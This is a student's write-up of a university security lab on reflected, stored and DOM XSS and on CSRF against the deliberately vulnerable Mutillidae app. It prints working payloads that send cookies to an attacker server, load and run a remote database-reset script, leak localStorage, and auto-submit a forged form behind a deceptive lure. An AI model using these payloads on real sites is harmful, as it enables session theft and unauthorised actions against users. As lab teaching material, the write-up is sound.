FIT5003 Cross-Site Scripting XSS

Posted on Edited on In ,
This article is related to FIT5003 2020S2 Lab 10. The main aspects that these labs review are 3 types of XSS and CSRF. We will discuss how to inject each of the vulnerability and how to defend the attacks.

Week 10 Lab - XSS

Environment Setup

Start the XAMPP server by using code below:

1
sudo /opt/lampp/lampp s

3 Types of XSS

Main damages:

  1. access cookies, session tokens, or other sensitive information.

  2. rewrite HTML page.

There are 3 types of XSS: Reflected, Stored, DOM.

Reflected XSS

image from https://hydrasky.com/networksecurity/cross-site-scriptingxss-attack/

Task One: Popup windows

Practice version:

'OWASP 2017' --> 'A7 – Cross-Site Scripting (XXS)' --> 'Reflected(First order)' --> 'DNS Lookup'

Mission:

Enter a small script into the "Hostname/IP" input to popup window to do some alert.

Answer:

We firstly check the source for this website by pressing "ctrl+u". Then we can find the input that we just type. For example, I entered "fit5003":

1
2
3
4
5
<div class="report-header" ReflectedXSSExecutionPoint="1">Results for fit5003</div><pre class="report-header" style="text-align:left;">Server:		127.0.1.1
Address:	127.0.1.1#53

Non-authoritative answer:
*** Can't find fit5003: No answer

So we can see that this input will be added inside the <div> block. If we replace "fit5003" by some malicious script, the website will immediately execute the script. And this is reflected XSS.

I will use the following code to attack the website:

1
<script>alert("So long and thanks for all the fish!")</script>

Results:

Practice version:

'OWASP 2017' --> 'A7 – Cross-Site Scripting (XXS)' --> 'Reflected(First order)' --> 'DNS Lookup'

Mission:

Display a specific user's cookie.

Answer:

  1. Register with a username & password in register page. For example, I use Hitchhiker & 42 as username & password.

  1. Login as Hitchhiker. Go to DNS LOOKUP page, and submit the script below:
1
<script>alert(document.cookie)</script>

Results:

Task Three: Attack from Attacker's port

I'm too lame to open another VM, so I just quickly go through this part without the result image.

Practice version:

'OWASP 2017' --> 'A7 – Cross-Site Scripting (XXS)' --> 'Reflected(First order)' --> 'DNS Lookup'

Mission:

Send a specific user's cookie to attacker's server.

Ans:

Go to DNS LOOKUP page, and submit the script below:

1
<script>document.write("<img src=http://127.0.0.1:5555?c="+document.cookie+">");</script>

And the cookie will be sent to attacker.

Advanced Reflected XSS

We are now using Reflected XSS to seduce a client to download and execute a JavaScript file on the attacker's server.

To better understand the process, we firstly open the interpreter of burp suit. We can capture the GET request to http://localhost/mutillidae/set-up-database.php.

We can then create a malicious script to execute our command.

1
2
3
4
5
6
7
8
function resetDB()
{
	var uri = "http://localhost/mutillidae/set-up-database.php"; // database address
	xhr = new XMLHttpRequest(); // create a new HTTP request class: xhr
	xhr.open("GET",uri); // xhr call open method, and the argv is GET method and the direction is to uri
	xhr.send(null); //if sucess, send null.
}
resetDB();

We save this file as resetDB.js.

Task: Server side download a file

Practice version:

'OWASP 2017' --> 'A7 – Cross-Site Scripting (XXS)' --> 'Reflected(First order)' --> 'DNS Lookup'

Mission:

Seduce a client to download and execute a JavaScript file on the attacker's server.

Answer:

  1. Run
1
python3 -m http.server 9090

at the location of attacker's server to open the port.

  1. Register a new account. This is for checking if the attack succeed or not.

  2. Go to DNS LOOKUP page, and enter the script:

1
<script src = "http://127.0.0.1:9090/resetDB.js">
  1. After submit, we can check the existence of the new account that we create in step 2.

Results:

This means the database has been reset, which means the resetDB.js has been successfully executed.

Stored XSS

Before I write this article, I've done all the tasks inside Lab 10. Unfortunately, I found that I can't connect to the database now. So I can only describe the following attacks. But I will still provide the code and explanation.

Stored XSS, image from https://hydrasky.com/network-security/crosssite-scriptingxss-attack/

Practice version:

'OWASP 2017' --> 'A7 – Cross-Site Scripting (XXS)' --> 'Persistent(Second Order)' --> 'Add to your blog'

Missions:

  1. Popup window

  2. Steal cookie

Answers:

  1. Register as a new user.

  2. Go Add to your blog page, submit script below:

1
<script>alert("Hello!")</script>

When we open the blog, the "Hello!" window will popup.

  1. If we change the script to:
1
<script>alert(document.cookie)</script>

then the content of the popup window will be the user's cookie.

DOM XSS

Practice version:

'OWASP 2017' --> 'A7 – Cross-Site Scripting (XXS)' --> 'Persistent(Second Order)' --> 'Add to your blog'

'OWASP 2017' --> 'A7 – Cross-Site Scripting (XXS)' --> 'DOM-based' --> 'HTML5 Web Storage'

'Others' --> 'Data Capture Pages' --> 'View Captured Data'

Mission 1: Add blog to Add to your blog and leak all the local storage.

Answers:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<script> 
    try {
        var m = "";
        var l = window.localStorage;
        for (i = 0; i < l.length; i++){
            var lKey = l.key(i);
            m += lKey + "=" + l.getItem(lKey) + ";\\n";
        };
        document.location = "http://localhost/mutillidae/capture-data.php?html5storage=" + m;
    }
	catch (e) {
        alert(e.message);
    }
    </script>

add this to the blog, and check Captured Data Page.

Mission 2: Add values to HTML5 Web Storage

Answers:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<script>
    try{
        var m = "";
        var l = window.localStorage;
        for (i = 0; i < l.length; i++){
            var lKey = l.key(i);
            m += lKey + "=" + l.getItem(lKey) + ";\\n";
        };
        alert(m);
    }
	catch(e){
        alert(e.message);
    }
	
	localStorage.setItem("abc", "123"); // add new account
	try {
        var m = "";
        var l = window.localStorage;
        for (i = 0; i < l.length; i++){
            var lKey = l.key(i);
            m += lKey + "=" + l.getItem(lKey) + ";\\n";
        };
        alert(m);
    }
	catch(e){
        alert(e.message);
    }
    </script>

add this to the blog, and check HTML5 page.

Cross Site Request Forgery(CSRF)

Cross Site Request Forgery Attacks (image from https://hydrasky.com/network-security/crosssite-request-forgery-csrf/)

Script to add in Add Blog page:

1
2
3
4
5
6
7
8
9
10
11
<form id="f"
action="index.php?page=add-to-your-blog.php"
method="post"
enctype="application/x-www-form-urlencoded">
<input type="hidden" name="csrf-token" value="best-guess"/>
<input type="hidden" name="blog_entry" value="I like FIT5003 Solfware Security"/>
<input type="hidden" name="add-to-your-blog-php-submit-button" value="TESTING"/>
</form>
<i onmouseover="window.document.getElementById(\"f\").submit()">
Tick Here to Obtain Higher Mark for Assignment 1
</i>